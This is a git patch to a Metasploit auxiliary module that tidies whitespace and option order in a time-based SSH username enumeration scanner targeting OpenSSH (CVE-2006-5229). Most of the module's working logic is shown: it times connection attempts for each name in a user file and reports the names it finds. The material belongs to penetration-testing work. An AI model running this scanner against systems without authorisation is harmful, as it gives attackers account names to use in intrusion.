From 1a2899d57b8d0017dcc81124b09531b5891756ba Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 23 Apr 2014 10:00:34 -0500 Subject: [PATCH] Fix up whitespace 'n' stuff --- .../auxiliary/scanner/ssh/ssh_enumusers.rb | 62 +++++++------------ 1 file changed, 24 insertions(+), 38 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index e5ff043108..5a08c128e2 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -12,50 +12,47 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::CommandShell - def initialize - super( + def initialize(info = {}) + super(update_info(info 'Name' => 'SSH Username Enumeration', 'Description' => %q{ This module uses a time-based attack to enumerate users in a OpenSSH server. }, 'Author' => ['kenkeiras'], 'References' => - [ - ['CVE', '2006-5229'] - ], + [ + ['CVE', '2006-5229'] + ], 'License' => MSF_LICENSE - ) + )) register_options( [ + Opt::RPORT(22), OptPath.new('USER_FILE', - [true, 'File containing usernames, one per line', nil]), + [true, 'File containing usernames, one per line', nil]), OptInt.new('THRESHOLD', - [true, - 'Amount of seconds needed before a user is considered ' \ - 'found', 10]), - Opt::RPORT(22) + [true, + 'Amount of seconds needed before a user is considered ' \ + 'found', 10]) ], self.class ) register_advanced_options( [ - OptBool.new('SSH_DEBUG', - [false, 'Enable SSH debugging output (Extreme verbosity!)', - false]), - - OptInt.new('SSH_TIMEOUT', - [false, 'Specify the maximum time to negotiate a SSH session', - 10]), - OptInt.new('RETRY_NUM', [true , 'The number of attempts to connect to a SSH server' \ - ' for each user', 3]) + ' for each user', 3]), + OptInt.new('SSH_TIMEOUT', + [false, 'Specify the maximum time to negotiate a SSH session', + 10]), + OptBool.new('SSH_DEBUG', + [false, 'Enable SSH debugging output (Extreme verbosity!)', + false]) ] ) end - def rport datastore['RPORT'] end @@ -90,16 +87,12 @@ class Metasploit3 < Msf::Auxiliary ::Timeout.timeout(datastore['SSH_TIMEOUT']) do Net::SSH.start(ip, user, opt_hash) end - rescue Rex::ConnectionError, Rex::AddressInUse return :connection_error - rescue Net::SSH::Disconnect, ::EOFError return :success - rescue ::Timeout::Error return :success - rescue Net::SSH::Exception end @@ -112,29 +105,25 @@ class Metasploit3 < Msf::Auxiliary end end - def do_report(ip, user, port) report_auth_info( - :host => ip, - :port => rport, - :sname => 'ssh', - :user => user, + :host => ip, + :port => rport, + :sname => 'ssh', + :user => user, :active => true ) end - def user_list File.new(datastore['USER_FILE']).read.split end - def attempt_user(user, ip) attempt_num = 0 ret = nil while attempt_num <= retry_num and (ret.nil? or ret == :connection_error) - if attempt_num > 0 Rex.sleep(2 ** attempt_num) print_debug "Retrying '#{user}' on '#{ip}' due to connection error" @@ -143,28 +132,25 @@ class Metasploit3 < Msf::Auxiliary ret = check_user(ip, user, rport) attempt_num += 1 end + ret end - def show_result(attempt_result, user, ip) case attempt_result when :success print_good "User '#{user}' found on #{ip}" do_report(ip, user, rport) - when :connection_error print_error "User '#{user}' on #{ip} could not connect" - when :fail print_debug "User '#{user}' not found on #{ip}" - end end - def run_host(ip) print_status "Starting scan on #{ip}" user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) } end + end